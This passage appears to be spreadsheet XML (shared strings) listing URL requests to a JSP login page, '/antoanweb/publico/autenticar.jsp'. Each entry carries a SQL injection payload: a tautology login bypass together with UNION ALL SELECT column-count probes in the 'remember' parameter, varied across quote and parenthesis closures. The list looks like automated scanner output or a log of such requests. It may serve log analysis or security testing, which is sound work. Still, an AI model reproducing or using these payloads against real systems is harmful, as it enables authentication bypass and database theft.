  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3644,3644,3644,3644,3644,3644,3644#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5086,5086,5086,5086,5086,5086,5086,5086#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8986,8986,8986,8986,8986,8986,8986,8986,8986#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5525,5525,5525,5525,5525,5525,5525,5525,5525,5525#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5855#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect184,184#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6102,6102,6102#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1051,1051,1051,1051#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4112,4112,4112,4112,4112#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9212,9212,9212,9212,9212,9212#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1412,1412,1412,1412,1412,1412,1412#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4079,4079,4079,4079,4079,4079,4079,4079#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7667,7667,7667,7667,7667,7667,7667,7667,7667#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1119,1119,1119,1119,1119,1119,1119,1119,1119,1119#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7575#and(1799=1799&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9,9#and(7310=7310&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7586,7586,7586#and(5350=5350&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3623,3623,3623,3623#and(7693=7693&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1615,1615,1615,1615,1615#and(2670=2670&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2213,2213,2213,2213,2213,2213#and(6126=6126&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2412,2412,2412,2412,2412,2412,2412#and(9569=9569&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1282,1282,1282,1282,1282,1282,1282,1282#and(6254=6254&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect9384,9384,9384,9384,9384,9384,9384,9384,9384#and(6190=6190&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect3019,3019,3019,3019,3019,3019,3019,3019,3019,3019#and(2311=2311&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5565#and((157=157&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5655,5655#and((1290=1290&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8897,8897,8897#and((9064=9064&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5446,5446,5446,5446#and((433=433&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect6364,6364,6364,6364,6364#and((9484=9484&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1532,1532,1532,1532,1532,1532#and((932=932&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7623,7623,7623,7623,7623,7623,7623#and((3873=3873&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9104,9104,9104,9104,9104,9104,9104,9104#and((518=518&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9052,9052,9052,9052,9052,9052,9052,9052,9052#and((5342=5342&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1619,1619,1619,1619,1619,1619,1619,1619,1619,1619#and((2303=2303&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1976#and(((9200=9200&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9183,9183#and(((9493=9493&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6138,6138,6138#and(((1575=1575&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7782,7782,7782,7782#and(((4565=4565&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9099,9099,9099,9099,9099#and(((3207=3207&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect6342,6342,6342,6342,6342,6342#and(((5762=5762&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect755,755,755,755,755,755,755#and(((2223=2223&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8711,8711,8711,8711,8711,8711,8711,8711#and(((8208=8208&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8355,8355,8355,8355,8355,8355,8355,8355,8355#and(((5146=5146&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5855,5855,5855,5855,5855,5855,5855,5855,5855,5855#and(((2317=2317&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8680#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2396,2396#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect7567,7567,7567#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect81,81,81,81#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6284,6284,6284,6284,6284#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8295,8295,8295,8295,8295,8295#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect9557,9557,9557,9557,9557,9557,9557#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect145,145,145,145,145,145,145,145#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2076,2076,2076,2076,2076,2076,2076,2076,2076#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect7462,7462,7462,7462,7462,7462,7462,7462,7462,7462#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7905#and('hnee'='hnee&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7150,7150#and('rgac'='rgac&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3335,3335,3335#and('nxrj'='nxrj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1728,1728,1728,1728#and('vsgq'='vsgq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9389,9389,9389,9389,9389#and('mtrf'='mtrf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4442,4442,4442,4442,4442,4442#and('qdmu'='qdmu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6717,6717,6717,6717,6717,6717,6717#and('ujev'='ujev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4823,4823,4823,4823,4823,4823,4823,4823#and('ffhp'='ffhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7373,7373,7373,7373,7373,7373,7373,7373,7373#and('ymxm'='ymxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6420,6420,6420,6420,6420,6420,6420,6420,6420,6420#and('wien'='wien&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect823#and(('secz'='secz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect5307,5307#and(('yisp'='yisp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6346,6346,6346#and(('nheg'='nheg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect663,663,663,663#and(('yqaj'='yqaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3047,3047,3047,3047,3047#and(('zfom'='zfom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3428,3428,3428,3428,3428,3428#and(('gpay'='gpay&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3270,3270,3270,3270,3270,3270,3270#and(('hugr'='hugr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4569,4569,4569,4569,4569,4569,4569,4569#and(('sehk'='sehk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3930,3930,3930,3930,3930,3930,3930,3930,3930#and(('vspu'='vspu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect8101,8101,8101,8101,8101,8101,8101,8101,8101,8101#and(('hphk'='hphk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8669#and((('jjgn'='jjgn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4643,4643#and((('swck'='swck&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7747,7747,7747#and((('dglh'='dglh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6861,6861,6861,6861#and((('tani'='tani&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8548,8548,8548,8548,8548#and((('vgtv'='vgtv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2555,2555,2555,2555,2555,2555#and((('jrzk'='jrzk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1898,1898,1898,1898,1898,1898,1898#and((('xazj'='xazj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4632,4632,4632,4632,4632,4632,4632,4632#and((('vdxw'='vdxw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2118,2118,2118,2118,2118,2118,2118,2118,2118#and((('wjmi'='wjmi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5146,5146,5146,5146,5146,5146,5146,5146,5146,5146#and((('elkp'='elkp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5248#and'mybe'='mybe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6025,6025#and'jckr'='jckr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6524,6524,6524#and'auks'='auks&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4385,4385,4385,4385#and'wxfa'='wxfa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3671,3671,3671,3671,3671#and'rncw'='rncw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect88,88,88,88,88,88#and'psoe'='psoe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9574,9574,9574,9574,9574,9574,9574#and'xano'='xano&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect228,228,228,228,228,228,228,228#and'jecr'='jecr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7746,7746,7746,7746,7746,7746,7746,7746,7746#and'mrrc'='mrrc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9723,9723,9723,9723,9723,9723,9723,9723,9723,9723#and'tnzf'='tnzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect920#and('ejkg'like'ejkg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7309,7309#and('cknd'like'cknd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6799,6799,6799#and('zuwo'like'zuwo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4638,4638,4638,4638#and('otbf'like'otbf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2009,2009,2009,2009,2009#and('jahb'like'jahb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2794,2794,2794,2794,2794,2794#and('alll'like'alll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8898,8898,8898,8898,8898,8898,8898#and('jgkg'like'jgkg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8105,8105,8105,8105,8105,8105,8105,8105#and('urym'like'urym&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect4957,4957,4957,4957,4957,4957,4957,4957,4957#and('qrdj'like'qrdj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9148,9148,9148,9148,9148,9148,9148,9148,9148,9148#and('nowu'like'nowu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2642#and(('mcsp'like'mcsp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9531,9531#and(('yrvz'like'yrvz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6594,6594,6594#and(('elml'like'elml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6900,6900,6900,6900#and(('eufs'like'eufs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3815,3815,3815,3815,3815#and(('bgoy'like'bgoy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6601,6601,6601,6601,6601,6601#and(('dinu'like'dinu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect721,721,721,721,721,721,721#and(('vqao'like'vqao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2187,2187,2187,2187,2187,2187,2187,2187#and(('kmxz'like'kmxz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2010,2010,2010,2010,2010,2010,2010,2010,2010#and(('ufcw'like'ufcw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1702,1702,1702,1702,1702,1702,1702,1702,1702,1702#and(('jwmz'like'jwmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9505#and((('vpgy'like'vpgy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6628,6628#and((('loor'like'loor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9967,9967,9967#and((('cojm'like'cojm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6742,6742,6742,6742#and((('bhuh'like'bhuh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3862,3862,3862,3862,3862#and((('bksr'like'bksr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4759,4759,4759,4759,4759,4759#and((('cdzs'like'cdzs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect536,536,536,536,536,536,536#and((('pawp'like'pawp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3040,3040,3040,3040,3040,3040,3040,3040#and((('kqpf'like'kqpf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8905,8905,8905,8905,8905,8905,8905,8905,8905#and((('daxr'like'daxr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8467,8467,8467,8467,8467,8467,8467,8467,8467,8467#and((('exzn'like'exzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9031#and'vziz'like'vziz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6003,6003#and'tpkb'like'tpkb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9540,9540,9540#and'stod'like'stod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1921,1921,1921,1921#and'tnpw'like'tnpw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8715,8715,8715,8715,8715#and'nfod'like'nfod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect912,912,912,912,912,912#and'oean'like'oean&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5113,5113,5113,5113,5113,5113,5113#and'akzo'like'akzo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4441,4441,4441,4441,4441,4441,4441,4441#and'xbuo'like'xbuo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9113,9113,9113,9113,9113,9113,9113,9113,9113#and'amod'like'amod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8278,8278,8278,8278,8278,8278,8278,8278,8278,8278#and'luit'like'luit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3729#and("uikz"="uikz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4764,4764#and("cqwo"="cqwo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3708,3708,3708#and("hcqp"="hcqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect1380,1380,1380,1380#and("vnex"="vnex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7453,7453,7453,7453,7453#and("qdor"="qdor&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2250,2250,2250,2250,2250,2250#and("fefa"="fefa&amp;modo=entrar</t>
  </si>
  <si>
